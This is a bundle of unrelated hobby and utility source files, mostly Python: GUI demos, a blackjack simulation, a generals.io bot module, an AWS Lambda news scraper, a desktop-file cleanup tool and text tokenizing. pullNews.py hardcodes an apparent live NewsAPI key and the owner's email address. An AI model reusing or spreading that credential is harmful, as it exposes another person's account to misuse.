highlightcolor=\"red\")\r\n#btnInfo = tk.Button (top, text = \" Info \", command = InfoCallBack, fg=\"Green\", bg=\"gray\")\r\nbtnInfo = tk.Button (top, text = \" Info \", command = InfoCallBack, fg=\"#ff0000\", bg=colorBG, justify=\"right\", width=20)\r\n\r\nbtnHello.grid()\r\nbtnInfo.grid()\r\n\r\n\r\nbtn1 = tk.Button (top, text=\"New Button\")\r\nbtn1.grid()\r\n\r\ntop.mainloop() \r\n\r\n\r\n# NOTE:\r\n# https://mail.python.org/pipermail//tkinter-discuss/2011-August/002916.html\r\n# - tkMessageBox has been renamed to messagebox in Python 3.x.\r\n# - Module is not available in tkinter\r\n# - code : from tkinter import messagebox\r\n\r\n# http://www.tutorialspoint.com/python/tk_button.htm\r\n# http://www.tutorialspoint.com/python/python_gui_programming.htm # GUI Programming\r\n#\r\n# http://www.tutorialspoint.com/python/tk_colors.htm\r\n#\r\n","sub_path":"tkinter/tkinter_grid/Button.py","file_name":"Button.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"480077964","text":"# (7) Prime Miniers of the UK\r\n\r\ntextFile = open(\"UKPrimeMiniser.txt\", \"w\")\r\n\r\n#print(\"(Debug) Writing to UKPrimeMinister.txt\") # Debug --> Tells your if the code gets to this point\r\n\r\ntextFile.write(\"Last seven UK Prime Minisers and term of office. 
\\n\")\r\ntextFile.write(\"\\n\")\r\ntextFile.write(\"Boris Johnson -> 2019 - current \\n\")\r\ntextFile.write(\"Theresa May -> 2016 - 2019 \\n\")\r\ntextFile.write(\"David Cameron -> 2010 - 2016 \\n\")\r\ntextFile.write(\"Gordon Brown -> 2007 - 2010 \\n\")\r\ntextFile.write(\"Tony Blair -> 1997 - 2007 \\n\")\r\ntextFile.write(\"John Major -> 1990 - 1997 \\n\")\r\ntextFile.write(\"Mararet Thatcher -> 1979 - 1990 \\n\")\r\n#print(\"(Debug) Writen to UKPrimeMinister.txt\") # Debug --> Tells your if the code gets to this point\r\ntextFile.close()\r\n\r\ntextFile = open(\"UKPrimeMiniser.txt\", \"r\")\r\n#print(\"(Debug) Reading to UKPrimeMinister.txt\") # Debug --> Tells your if the code gets to this point\r\nprint(textFile.read())\r\ntextFile.close()\r\n","sub_path":"Text File Work/Prime Minsters UK.py","file_name":"Prime Minsters UK.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"219187863","text":"# figure out how to request an article and its headline\n# method to be used in keywordExtractor\n# should pull headlines \n# get URL of where the headlines exist\n\n# Pair programming Authors: \n# Driver: Niran Prajapati\n# Observer: Alexandra Garton\n\nfrom newsapi import NewsApiClient\n\nfrom logTool import Log\n\n\ndef get_headlines(source):\n \n newsApi = NewsApiClient(api_key = '3bd762aea6134796b564d8e18df60cf8') # handle authentication with a News API key (registered using zjcarvin@outlook.com)\n titles = []\n urls = []\n\n try:\n \t# get top headlines from \"source\"\n \ttop_headlines = newsApi.get_top_headlines(sources = source, language = 'en')\n except Exception as e:\n \tLog('error', repr(e))\n else:\n \tnum_articles = len(top_headlines['articles'])\n\n \tif (num_articles > 0):\n \t\t# get and append all article URL's\n \t\tfor i in range(num_articles):\n \t\t\ttitles.append(top_headlines['articles'][i]['title'])\n \t\t\turls.append(top_headlines['articles'][i]['url'])\n \telse:\n \t\tLog('warning', 'The top headline list is empty.')\n \n return titles, urls\n\n############ END OF FEATURE ############ \n\n# test purposes only\nif __name__ == '__main__':\n\tprint(get_headlines('bbc-news'))","sub_path":"SpotifyNews/pullNews.py","file_name":"pullNews.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"161327687","text":"'''\nSo went to a Casino recently. I noticed at the Blackjack tables the house tends\nto use several decks and not 1. My mind began to wonder about how likely natural\nblackjacks (getting an ace and a card worth 10 points on the deal) can occur.\n\nSo for this monday challenge lets look into this. We need to be able to shuffle\ndeck of playing cards. 
(52 cards) and be able to deal out virtual 2 card hands\nand see if it totals 21 or not.\n\n Develop a way to shuffle 1 to 10 decks of 52 playing cards.\n Using this shuffle deck(s) deal out hands of 2s\n count how many hands you deal out and how many total 21 and output the percentage.\n\nInput:\n\nn: being 1 to 10 which represents how many deck of playing cards to shuffle together.\nOutput:\n\nAfter x hands there was y blackjacks at z%.\nExample Output:\n\nAfter 26 hands there was 2 blackjacks at %7.\n\n'''\nimport random\n\ndeck = {'Ace': 11,\n 'King': 10,\n 'Queen': 10,\n 'Jack': 10,\n 'Ten': 10,\n 'Nine': 9,\n 'Eight': 8,\n 'Seven': 7,\n 'Six': 6,\n 'Five': 5,\n 'Four': 4,\n 'Three': 3,\n 'Two': 2\n }\n\nwin =0\nlose = 0\nlst = []\nacc = 0\nhands = 0\nwhile hands < 26:\n acc = 0\n lst = []\n while acc < 2:\n # key/value pair\n candidate = random.choice(list(deck.keys()))\n # value\n valu = deck.get(candidate)\n lst.append(valu)\n acc += 1\n score = sum(lst)\n if score == 21:\n win += 1\n else:\n lose += 1\n hands += 1\n score = 0\n#print(win,lose)\n\nprint('After 26 hands there were ' + str(win) + ' blackjacks at ' + str(round(win/26 * 100, 2)) + '%')","sub_path":"albums/3/challenge161_easy/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"583660386","text":"# Given a binary tree and a number sequence, find if the sequence is present\n# as a root-to-leaf path in the given tree.\n\n\ndef find_path(root, sequence):\n if not root and not sequence:\n return True\n\n def dfs(root, sequence, curr):\n if not root:\n return sequence == curr\n curr.append(root.val)\n left = dfs(root.left, sequence, curr)\n right = dfs(root.right, sequence, curr)\n curr.pop()\n return left or right\n\n return dfs(root, sequence, [])\n","sub_path":"tree dfs/4.path_with_given_sequence.py","file_name":"4.path_with_given_sequence.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"131795074","text":"from lie_learn.representations.SO3.spherical_harmonics import rsh\nimport numpy as np\nimport plotly\nimport plotly.plotly as py\nfrom plotly.graph_objs import *\nfrom plotly.graph_objs.layout.scene import *\nimport os\nimport matplotlib.pyplot as plt\n\n#plotly.tools.set_credentials_file(username=os.environ['plotly_user'], api_key=os.environ['plotly_key'])\n\nDEFAULT_AXIS = dict(showbackground=True,\n backgroundcolor=\"rgb(230, 230,230)\",\n gridcolor=\"rgb(255, 255, 255)\",\n zerolinecolor=\"rgb(255, 255, 255)\",\n )\n\nDEFAULT_LAYOUT = Layout(showlegend=False,\n width=500,\n height=500)\n\ndef get_random_coords(rnd, num_coords):\n coords = rnd.randn(num_coords,3)\n coords /= np.linalg.norm(coords, axis=-1, keepdims=True)\n# No origin for now\n# coords = np.concatenate((coords, [[0., 0., 0.]]), axis=0)\n return coords\n\ndef xyz_to_phi_theta(x):\n phi = np.arccos(x[...,2] / np.linalg.norm(x, axis=-1))\n theta = np.arctan2(x[..., 0], x[..., 1])\n return phi, theta\n\ndef get_Ylm_coeffs(phi, theta, L_max=5, sum=True):\n Ls = np.array([l for l in range(0, L_max + 1, 1) for m in range(-l, l+1)])\n Ls = Ls.reshape(*[-1, *np.ones(len(phi.shape), dtype=int)])\n Ms = np.array([m for l in range(0, L_max + 1, 1) for m in range(-l, l+1)])\n Ms = Ms.reshape(*[-1, *np.ones(len(phi.shape), dtype=int)])\n ylms = rsh(Ls, Ms, np.expand_dims(phi, axis=0), np.expand_dims(theta, axis=0))\n if sum:\n return 
np.sum(ylms, axis=-1)\n else:\n return ylms\n\ndef spherical_plotly_trace(coeff, L_max, num_angular_points=200):\n phi = np.expand_dims(np.linspace(0, np.pi, num_angular_points), axis=0)\n theta = np.expand_dims(np.linspace(0, 2 * np.pi, num_angular_points), axis=-1)\n \n # Phi is 0 to pi and theta 0 to 2 pi\n x = np.sin(phi) * np.sin(theta)\n y = np.sin(phi) * np.cos(theta)\n z = np.cos(phi) * np.ones(theta.shape)\n \n Ls = np.expand_dims(np.expand_dims(\n np.array([l for l in range(0, L_max + 1, 1) for m in range(-l, l+1)]), axis=-1), axis=-1)\n Ms = np.expand_dims(np.expand_dims(\n np.array([m for l in range(0, L_max + 1, 1) for m in range(-l, l+1)]), axis=-1), axis=-1)\n coeff = np.expand_dims(np.expand_dims(coeff, axis=-1), axis=-1)\n Ys = np.sum(coeff * rsh(Ls, Ms, np.expand_dims(phi, axis=0), np.expand_dims(theta, axis=0)), axis=0)\n return x, y, z, Ys\n\ndef visualize_spharm_and_coords(real_coords, pred_coord, L_max=8, num_angular_points=200):\n\n angles = xyz_to_phi_theta(real_coords)\n coeffs = get_Ylm_coeffs(*angles, L_max=L_max)\n print(coeffs.shape)\n x, y, z, Y_signal = spherical_plotly_trace(coeffs, L_max=L_max, num_angular_points=num_angular_points)\n \n x2, y2, z2 = real_coords[:, 0], real_coords[:, 1], real_coords[:, 2]\n x3, y3, z3 = pred_coord[:, 0], pred_coord[:, 1], pred_coord[:, 2]\n \n trace = Surface(x=x,\n y=y,\n z=z,\n showscale=True, \n surfacecolor=Y_signal,\n opacity=0.75)\n \n trace2 = Scatter3d(x=x2,\n y=y2,\n z=z2, mode='markers')\n\n trace3 = Scatter3d(x=x3,\n y=y3,\n z=z3, mode='markers')\n \n data = [trace, trace2, trace3]\n fig = Figure(data=data, layout=DEFAULT_LAYOUT)\n return fig\n\ndef visualize_coeff_series(coeffs, L_max=8, num_angular_points=200, cmin=None, cmax=None): \n make_trace = lambda x: spherical_plotly_trace(x, L_max=L_max, num_angular_points=num_angular_points)\n data = data = [Surface(x=x, y=y, z=z, visible=False, name = 'x= '+str(step),\n showscale=True, surfacecolor=Y_signal, cmin=cmin, cmax=cmax) \n for step, (x, y, z, Y_signal) in zip(range(len(coeffs)), map(make_trace, coeffs))] \n\n data[0]['visible'] = True\n \n steps = []\n for i in range(len(data)):\n step = dict(\n method = 'restyle', \n args = ['visible', [False] * len(data)],\n )\n step['args'][1][i] = True # Toggle i'th trace to \"visible\"\n steps.append(step)\n \n sliders = [dict(\n active = 0,\n currentvalue = {\"prefix\": \"x: \"},\n pad = {\"t\": 50},\n steps = steps\n )]\n \n layout = dict(sliders=sliders)\n fig = dict(data=data, layout=layout)\n return fig \n","sub_path":"linus/sph_projection_utils.py","file_name":"sph_projection_utils.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"252848360","text":"# Adding Two Negabinary Numbers\n# Given two numbers arr1 and arr2 in base -2, return the result of adding them together.\n# Each number is given in array format: as an array of 0s and 1s, from most significant bit to least significant bit. \n# For example, arr = [1,1,0,1] represents the number (-2)^3 + (-2)^2 + (-2)^0 = -3. 
A number arr in array format is also \n# guaranteed to have no leading zeros: either arr == [0] or arr[0] == 1.\n\n# Return the result of adding arr1 and arr2 in the same format: as an array of 0s and 1s with no leading zeros.\n\n# conditions\n# 1 <= arr1.length <= 1000\n# 1 <= arr2.length <= 1000\n# arr1 and arr2 have no leading zeros\n# arr1[i] is 0 or 1\n# arr2[i] is 0 or 1\n\n# code\nclass Solution: \n def addNegabinary(self, arr1: List[int], arr2: List[int]) -> List[int]:\n count = [0] * 2000\n n1 = len(arr1)\n n2 = len(arr2)\n for i, x in enumerate(arr1):\n actual = n1 - i - 1\n if x: count[actual] += 1\n for i, x in enumerate(arr2):\n actual = n2 - i - 1\n if x: count[actual] += 1\n for i in range(1500):\n while count[i] > 1:\n if count[i + 1]:\n count[i] -= 2\n count[i + 1] -= 1\n else:\n count[i] -= 2\n count[i + 1] += 1\n count[i + 2] += 1\n count.reverse()\n if 1 not in count: return [0]\n return count[count.index(1):]\n","sub_path":"Exercises/addNegabinary.py","file_name":"addNegabinary.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"330201496","text":"'''\n\t@ Travis Drake (EklipZ) eklipz.io - tdrake0x45 at gmail)\n\tApril 2017\n\tGenerals.io Automated Client - https://github.com/harrischristiansen/generals-bot\n\tEklipZ bot - Tries to play generals lol\n'''\n\nimport logging\nimport time\nimport json\nfrom SearchUtils import *\nfrom test.test_float import INF\n\nfrom base.client.map import new_map_matrix\n\n\n# attempts to classify tiles into territories.\nclass TerritoryClassifier():\n\tdef __init__(self, map):\n\t\tself.territories = [None for player in map.players]\n\t\tself.map = map\n\t\tself.lastCalculatedTurn = -1\n\t\tself.territoryMap = new_value_matrix(self.map, -1)\n\t\tself.needToUpdateAroundTiles = set()\n\t\tfor tile in self.map.pathableTiles:\n\t\t\tself.needToUpdateAroundTiles.add(tile)\n\n\tdef __getstate__(self):\n\t\tstate = self.__dict__.copy()\n\t\tif \"map\" in state:\n\t\t\tdel state[\"map\"]\n\t\treturn state\n\n\tdef __setstate__(self, state):\n\t\tself.__dict__.update(state)\n\t\tself.map = None\n\n\tdef should_recalculate(self, turn):\n\t\tif len(self.needToUpdateAroundTiles) > 0:\n\t\t\treturn True\n\t\treturn False\n\n\tdef revealed_tile(self, tile):\n\t\t\"\"\"\n\t\tWhen a tile is initially discovered, it should be used to weight territories as the player\n\t\tit was discovered as (to prevent the creep of neutral weighted discovery).\n\t\tNote that this gets immediately overwritten by the actual territory value for this tile,\n\t\tit is just used to weight the tiles around it during that cycle.\n\t\t\"\"\"\n\t\tself.territoryMap[tile.x][tile.y] = tile.player\n\t\tif tile.player != -1:\n\t\t\tfor movable in tile.movable:\n\t\t\t\tif not movable.discovered:\n\t\t\t\t\tself.territoryMap[movable.x][movable.y] = tile.player\n\n\tdef scan(self):\n\t\tlogging.info(\"Scanning map for territories, aww geez\")\n\t\tcounts = new_map_matrix(self.map, lambda x,y: [0 for n in range(len(self.map.players)+1)])\n\t\tstartTime = time.time()\n\t\tundiscoveredCounterDepth = 5\n\t\t# count the number of tiles for each player within range 3 to determine whose territory this is\n\t\tneutralNewIndex = len(self.map.players)\n\t\t\n\t\t# do a BFS foreach within a BFS foreach. 
Normal everyday stuff nbd\n\t\tdef foreach_near_updated_tiles(evaluatingTile):\n\t\t\tdef countFunc(tile):\n\t\t\t\tif tile.isMountain:\n\t\t\t\t\treturn\n\t\t\t\t\n\t\t\t\tcurrentTerritory = self.territoryMap[tile.x][tile.y]\n\t\t\t\tif not evaluatingTile.discovered:\n\t\t\t\t\t# weight based on territory already owned, making it harder to flip a territory (and hopefully better encapsulate who owns what)\n\t\t\t\t\tif currentTerritory != -1:\n\t\t\t\t\t\t# do NOT allow our player to own undiscovered territory. If owned by us, is neutral.\n\t\t\t\t\t\t# This prevents the undiscovered-tile-friendly-territory cascade from happening.\n\t\t\t\t\t\tif tile.discovered and not evaluatingTile.discovered and currentTerritory != self.map.player_index:\n\t\t\t\t\t\t\tcounts[evaluatingTile.x][evaluatingTile.y][currentTerritory] += 0.3\n\t\t\t\t\t\telif currentTerritory == self.map.player_index:\n\t\t\t\t\t\t\tcounts[evaluatingTile.x][evaluatingTile.y][neutralNewIndex] += 0.06\n\t\t\t\t\telse:\n\t\t\t\t\t\t# only discovered neutral tiles count, and only if we're trying to classify a neutral tile.\n\t\t\t\t\t\tcounts[evaluatingTile.x][evaluatingTile.y][neutralNewIndex] += 0.02\n\t\t\t\telse:\n\t\t\t\t\t# undiscovereds count for the evaluating tile player\n\t\t\t\t\tif not tile.discovered:\n\t\t\t\t\t\tcounts[evaluatingTile.x][evaluatingTile.y][evaluatingTile.player] += 0.2\n\t\t\t\t\telse:\n\t\t\t\t\t\tpIndex = tile.player\n\t\t\t\t\t\tif pIndex != -1 and pIndex != self.map.player_index:\n\t\t\t\t\t\t\tcounts[evaluatingTile.x][evaluatingTile.y][pIndex] += 1\n\t\t\t\t\t\telif pIndex != -1: \n\t\t\t\t\t\t\t# weight our tiles less because we see more of them.\n\t\t\t\t\t\t\tcounts[evaluatingTile.x][evaluatingTile.y][pIndex] += 0.8\n\t\t\t\t\n\t\t\tskip = lambda tile: tile.player == -1 and tile.discovered\n\t\t\tbreadth_first_foreach(self.map, [evaluatingTile], undiscoveredCounterDepth, countFunc, skipFunc = skip, noLog = True)\n\t\t\tmaxPlayer = -1\n\t\t\tmaxValue = 0\n\t\t\tfor pIndex, value in enumerate(counts[evaluatingTile.x][evaluatingTile.y]):\n\t\t\t\tif value > maxValue:\n\t\t\t\t\tmaxPlayer = pIndex\n\t\t\t\t\tmaxValue = value\n\t\t\tuserName = \"Neutral\"\n\t\t\t\t\n\t\t\t# convert back to -1 index for neutral\n\t\t\tif maxPlayer == neutralNewIndex:\n\t\t\t\tmaxPlayer = -1\n\t\t\telse:\n\t\t\t\tuserName = self.map.usernames[maxPlayer]\n\n\t\t\tif evaluatingTile.player != maxPlayer and evaluatingTile.player != -1:\n\t\t\t\tlogging.info(\"Tile {} is in player {} {} territory\".format(evaluatingTile.toString(), maxPlayer, userName))\n\t\t\t\n\n\t\t\tself.territoryMap[evaluatingTile.x][evaluatingTile.y] = maxPlayer\n\t\tstartTiles = list(self.needToUpdateAroundTiles)\n\t\tlogging.info(\" Scanning territory around {}\".format(\" - \".join([tile.toString() for tile in startTiles])))\n\t\tbreadth_first_foreach(self.map, startTiles, undiscoveredCounterDepth, foreach_near_updated_tiles, None, lambda tile: tile.isMountain, None, self.map.player_index)\n\t\tduration = time.time() - startTime\n\t\t\t\n\t\tlogging.info(\"Completed scanning territories in {:.3f}\".format(duration))\n\t\tself.needToUpdateAroundTiles = set()","sub_path":"Territory.py","file_name":"Territory.py","file_ext":"py","file_size_in_byte":4860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"219003873","text":"# Copyright 2020 Alex Woroschilow (alex.woroschilow@gmail.com)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in 
compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nimport configparser\nimport glob\nimport os\nimport pathlib\n\nimport hexdi\n\nconsole = hexdi.resolve('console')\nif not console: raise Exception('Console service not found')\ndescription = \"Remove abandoned .desktop files and icons\"\n\n\n@console.task(name=['cleanup', 'clear'], description=description)\ndef main(options=None, args=None):\n integration = '/usr/share' if options.systemwide else \\\n os.path.expanduser('~/.local/share')\n\n config = configparser.RawConfigParser()\n config.optionxform = str\n\n existed = []\n for desktop in glob.glob('{}/applications/*.desktop'.format(integration)):\n if os.path.isdir(desktop):\n continue\n\n yield console.green(\"[found]: {}\".format(console.comment(os.path.basename(desktop))))\n\n desktop_name = pathlib.Path(desktop)\n desktop_name = desktop_name.stem\n\n config.read(desktop)\n\n property_exec = config.get('Desktop Entry', 'Exec')\n property_exec = property_exec.split(' ')\n property_exec = property_exec.pop(0)\n\n property_exec_name = pathlib.Path(property_exec)\n property_exec_name = property_exec_name.stem\n\n if property_exec_name != desktop_name:\n yield console.warning(\"[removing]: {}, binary name is not the same as the .desktop file name...\".\n format(os.path.basename(desktop)))\n os.remove(desktop)\n continue\n\n if not os.path.exists(property_exec):\n yield console.warning(\"[removing]: {}, binary not found...\".format(os.path.basename(desktop)))\n os.remove(desktop)\n continue\n\n existed.append(config.get('Desktop Entry', 'Icon'))\n continue\n\n for icon in glob.glob('{}/icons/*'.format(integration)):\n if os.path.isdir(icon):\n continue\n\n yield console.green(\"[found]: {}\".format(console.comment(os.path.basename(icon))))\n\n icon = pathlib.Path(icon)\n if icon.stem in existed:\n continue\n\n yield console.warning(\"[removing]: {}, .desktop file not found...\".\n format(os.path.basename(icon)))\n\n os.remove(icon)\n continue\n\n return 0\n","sub_path":"src/plugins/cmd_command_cleanup/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"460013440","text":"import logging\nimport boto3\nimport os\nimport pytz\nimport requests\nimport json\nimport feedparser\nfrom requests import RequestException\nfrom datetime import datetime\nfrom common_lib import detailed_exception, get_adjusted_unix_time\n\n# Log level\nlogging.basicConfig()\nLOGGER = logging.getLogger()\nif os.environ[\"DEBUG_MODE\"] == \"true\":\n LOGGER.setLevel(logging.DEBUG)\nelse:\n LOGGER.setLevel(logging.INFO)\n\n# Get AWS region and necessary clients\nNEWS_TABLE = os.environ[\"NEWS_TABLE_NAME\"]\nEXPIRY_DAYS_OFFSET = int(os.environ[\"DOCUMENT_EXPIRY_DAYS\"])\nDYNAMODB_RESOURCE = boto3.resource(\"dynamodb\")\nSSM_CLIENT = boto3.client(\"ssm\")\nS3_CLIENT = boto3.client(\"s3\")\nS3_BUCKET_NAME = os.environ[\"BUCKET_NAME\"]\n\n\ndef news_parser(news_json: dict):\n \"\"\"\n Given a news JSON item from the unaltered API Response, it retains specific information and creates a JSON formatted\n dictionary containing data needed by the DynamoDB table. 
Variable names for the dictionary are in camelCase.\n\n :param news_json: Unaltered JSON item from UBCO news API Response\n :return: JSON formatted item for DynamoDB storage\n \"\"\"\n parsed_news = {\n \"newsId\": str(news_json.get(\"post-id\", \"Null\")),\n \"title\": news_json.get(\"title\", \"Null\"),\n \"link\": news_json.get(\"id\", \"Null\"),\n \"summary\": news_json.get(\"summary\", \"Null\"),\n \"mediaThumbnail\": news_json.get(\"media_thumbnail\", []),\n \"categories\": [category[\"term\"] for category in news_json[\"tags\"]],\n \"dateModified\": str(datetime.strptime(news_json[\"published\"].split(\",\")[1][1:-6], \"%d %b %Y %H:%M:%S\"))\n }\n return parsed_news\n\n\ndef get_news_items_from_web(news_link: str):\n \"\"\"\n Makes a network request to the news RSS Feed and returns the result of the request.\n Logs a network error if any an returns an empty list in that case\n :param news_link: URL for the new RSS Feed\n :return: List of news items\n \"\"\"\n json_response = []\n try:\n feed_response = requests.get(news_link).text\n json_response = feedparser.parse(feed_response)[\"entries\"]\n except RequestException as e:\n LOGGER.error(\"Network error in getting RSS Feed\")\n detailed_exception(LOGGER)\n return json_response\n\n\ndef lambda_handler(event, context):\n \"\"\"\n Lambda entry-point\n \"\"\"\n news_link = \"https://news.ok.ubc.ca/feed/\"\n news_items = []\n filtered_news_items = []\n\n response_items = get_news_items_from_web(news_link)\n if len(response_items) == 0:\n return {\"status\": \"No items in RSS Feed\"}\n\n # Iterate through list of raw items and parse them, if there is a parsing error, save the raw item that throws an\n # error to S3\n for item in response_items:\n try:\n news_item = news_parser(item)\n news_items.append(news_item)\n except Exception as e:\n S3_CLIENT.put_object(Body=json.dumps(item, indent=4), Bucket=S3_BUCKET_NAME,\n Key=f'ErrorLog/News/{str(datetime.now(tz=pytz.timezone(\"America/Vancouver\")))[:-13]}.json')\n LOGGER.error(f\"Error in parsing a news item, raw item saved to {S3_BUCKET_NAME}/ErrorLog/News\")\n detailed_exception(LOGGER)\n\n # Filter the parsed items based on last query time to get only new items\n try:\n last_query_time = SSM_CLIENT.get_parameter(Name=\"NewsQueryTime\")[\"Parameter\"][\"Value\"]\n for news_item in news_items:\n if datetime.strptime(last_query_time, \"%Y-%m-%d %H:%M:%S\") \\\n < datetime.strptime(news_item[\"dateModified\"], \"%Y-%m-%d %H:%M:%S\"):\n filtered_news_items.append(news_item)\n SSM_CLIENT.put_parameter(Name=\"NewsQueryTime\",\n Value=str(datetime.now(tz=pytz.timezone(\"America/Vancouver\")))[:-13],\n Overwrite=True)\n except SSM_CLIENT.exceptions.InternalServerError as e:\n LOGGER.error(\"Error in communicating with Parameter store\")\n detailed_exception(LOGGER)\n\n LOGGER.debug(json.dumps(news_items, indent=4))\n LOGGER.debug(json.dumps(filtered_news_items, indent=4))\n\n # Save new items to central data lake S3\n if len(filtered_news_items) != 0:\n S3_CLIENT.put_object(Body=json.dumps(filtered_news_items, indent=4), Bucket=S3_BUCKET_NAME,\n Key=f'News/{str(datetime.now(tz=pytz.timezone(\"America/Vancouver\")))[:-13]}.json')\n\n # Insert items into DynamoDB table with appropriate TTL\n table = DYNAMODB_RESOURCE.Table(NEWS_TABLE)\n for events_item in filtered_news_items:\n events_item[\"expiresOn\"] = get_adjusted_unix_time(events_item[\"dateModified\"], \"%Y-%m-%d %H:%M:%S\",\n EXPIRY_DAYS_OFFSET * 24)\n table.put_item(Item=events_item)\n\n return {\"status\": 
\"completed\"}\n\n","sub_path":"functions/get_news_data/get_news_data.py","file_name":"get_news_data.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"31526574","text":"#!/usr/bin/env python3\n\n\nimport requests\nimport random\n\n\nclass Plugin:\n def __init__(self, bot):\n self.bot = bot\n bot.register_command(__name__, ['giphy', 'gp'], self.giphy,\n channels=['!##monsterhunter'])\n\n def giphy(self, server, user, channel, *query):\n \"\"\"Searches giphy and returns a random result.\"\"\"\n query = ' '.join(query)\n key = self.bot.settings['giphy_key']\n req = requests.get('http://api.giphy.com/v1/gifs/search?q={}'\n '&api_key={}'.format(query, key))\n data = req.json()\n if data['data'] == []:\n return '[\\x035Giphy\\x03] No results'\n images = random.choice(data['data'])['images']\n return '[\\x033Giphy\\x03] {}'.format(images['original']['url'])\n\n\n","sub_path":"plugins/giphy.py","file_name":"giphy.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"616564774","text":"#-*- encoding: utf-8 -*-\n\nimport sys\nreload(sys).setdefaultencoding(\"utf8\")\n\nimport urllib\nimport urllib2\nimport json\n\ndef reply(url, s):\n try:\n response = urllib2.urlopen(url)\n data = response.read()\n result = json.loads(data.decode(\"utf8\"))\n if result['source']:\n \tre = result['hitokoto'] + \" —— \" + result['author'] + \",\" + result['source']\n else:\n \tre = result['hitokoto'] + \" —— \" + result['author']\n return re.decode(\"utf8\")\n except:\n return \"玩坏掉了。\"","sub_path":"function/webapi/maxim.py","file_name":"maxim.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"10163892","text":"from fix_typos import fix_typos\nimport re\n\ndef comment_to_tokens(comment):\n\ttokens = []\n\tlines = comment.split('\\n')\n\tfor line in lines:\n\t\tline = line.strip()\n\t\tif line:\n\t\t\tline = line.lower()\n\t\t\tline = fix_typos(line)\n\t\t\tline_tokens = str_to_tokens(line)\n\t\t\tif line_tokens:\n\t\t\t\ttokens.extend(line_tokens)\n\t\t\t\ttokens.append('')\n\tif tokens and tokens[-1] != '':\n\t\ttokens.append('')\n\treturn tokens\n\ndef str_to_tokens(s):\n\ttokens = []\n\tfor token in s.split(' '):\n\t\tprocess_token(token, tokens)\n\treturn tokens\n\ndef process_token(token, tokens):\n\ttoken = token.strip()\n\tif not token:\n\t\treturn False\n\n\ttoken = token.strip()\n\tif not token:\n\t\treturn False\n\tif not re.search('[a-zа-яё0-9\\-_–:()^=>$/]', token):\n\t\treturn False\n\n\tif re.match('>+.', token):\n\t\ttokens.append('>')\n\t\treturn process_token(re.sub('^>+', '', token), tokens)\n\n\tif re.fullmatch('[a-fole0-9]{32,}', token):\n\t\treturn False\n\tif re.fullmatch('[a-z0-9.\\-]+@[a-z0-9.\\-]+', token):\n\t\ttokens.append('ti.hui@i.pidor.com')\n\t\treturn True\n\tif token.startswith('chrome://flags'):\n\t\ttokens.append(token)\n\t\treturn True\n\tif re.fullmatch('(https?://)?[a-z0-9.\\-]+\\.(com|net|ru|onion|org)/?[a-zа-яё0-9:/\\-.?=_#$%]+', token):\n\t\ttokens.append(token)\n\t\treturn True\n\n\tif re.fullmatch('т\\.[еодп]\\.?', token):\n\t\ttokens.append(re.sub('\\.?$', '.', token))\n\t\treturn True\n\tif re.fullmatch('.*?[0-9]*т\\.р\\.?', token):\n\t\tif re.search('[0-9]', token):\n\t\t\ttokens.append('т.р.')\n\t\telse:\n\t\t\ttokens.append('т.р.')\n\t\treturn True\n\tif token == 
'9000':\n\t\ttokens.append(token)\n\t\treturn True\n\tif re.fullmatch('[0-9][\\-+.0-9]*', token):\n\t\ttokens.append('')\n\t\treturn True\n\tif re.match('[0-9][\\-+.0-9]*[\\-/$]*[a-zа-яё]+', token):\n\t\ttokens.append('')\n\t\tsts = re.sub('^[\\-+.0-9]*[0-9](-?)(\\$?)(/?)', '\\\\1 \\\\2 \\\\3 ', token).split(' ')\n\t\tfor st in sts:\n\t\t\tprocess_token(st, tokens)\n\t\treturn True\n\n\tif token == '(нет)':\n\t\ttokens.append(token)\n\t\treturn True\n\n\tif re.fullmatch('.*?:\\)+', token):\n\t\tprocess_token(re.sub(':\\)+$', '', token), tokens)\n\t\ttokens.append(':)')\n\t\treturn True\n\tif re.fullmatch('.*?:\\(+', token):\n\t\tprocess_token(re.sub(':\\(+$', '', token), tokens)\n\t\ttokens.append(':(')\n\t\treturn True\n\tif re.fullmatch('.*?:d+', token):\n\t\tprocess_token(re.sub(':d+$', '', token), tokens)\n\t\ttokens.append(':d')\n\t\treturn True\n\tif re.fullmatch('.*?xd+', token):\n\t\tprocess_token(re.sub('xd+$', '', token), tokens)\n\t\ttokens.append('xd')\n\t\treturn True\n\tif re.fullmatch('.*?:[3з]', token):\n\t\tprocess_token(re.sub(':[3з]+$', '', token), tokens)\n\t\ttokens.append(':3')\n\t\treturn True\n\tif re.fullmatch('.*?\\^_\\^', token):\n\t\tprocess_token(re.sub('\\^_\\^+$', '', token), 